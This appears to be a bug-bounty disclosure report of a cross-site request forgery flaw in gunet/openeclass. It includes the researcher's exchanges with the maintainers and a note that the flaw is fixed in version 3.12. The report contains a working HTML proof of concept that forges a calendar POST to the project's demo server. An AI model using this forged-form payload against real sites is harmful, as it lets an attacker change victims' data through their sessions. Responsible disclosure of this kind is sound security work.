Cross-Site Request Forgery (CSRF) in gunet/openeclass

Valid

Reported on Sep 29th 2021


Description

Missing CSRF token on all form POST actions in the application.

Proof of Concept

<!-- CSRF PoC -->
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.openeclass.org/main/personal_calendar/index.php" method="POST">
      <input type="hidden" name="id" value="" />
      <input type="hidden" name="rep" value="" />
      <input type="hidden" name="newTitle" value="test" />
      <input type="hidden" name="newContent" value="&lt;p&gt;test&lt;&#47;p&gt;" />
      <input type="hidden" name="startdate" value="01&#45;09&#45;2021&#32;17&#58;30" />
      <input type="hidden" name="duration" value="1&#58;00" />
      <input type="hidden" name="frequencynumber" value="1" />
      <input type="hidden" name="frequencyperiod" value="D" />
      <input type="hidden" name="enddate" value="" />
      <input type="hidden" name="refobjgentype" value="&#45;1" />
      <input type="hidden" name="refcourse" value="course&#58;1456" />
      <input type="hidden" name="refobjtype" value="0" />
      <input type="hidden" name="refobjid" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

With a CSRF attack, an attacker can add, edit, and delete data in the application on behalf of the victim: the browser attaches the victim's session cookie to the forged POST, and the server has no way to tell it from a submission of its own form.

lethanhphuc modified the report, a year ago

We have contacted a member of the gunet/openeclass team and are waiting to hear back, a year ago

gunet/openeclass maintainer (Maintainer), a year ago:

Thanks for your comment! We will take care of the above in the forthcoming release.

lethanhphuc (Researcher), a year ago:

OK. don't forget to update the report when done

lethanhphuc (Researcher), a year ago:

@maintainer Can you validate the report pls?

lethanhphuc (Researcher), a year ago:

@maintainer Can you validate the report?

lethanhphuc (Researcher), a year ago:

@maintainer Can you validate the report?
Alexandros Diamantidis validated this vulnerability a year ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alexandros Diamantidis marked this as fixed in 3.12 with commit 5d5deb a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE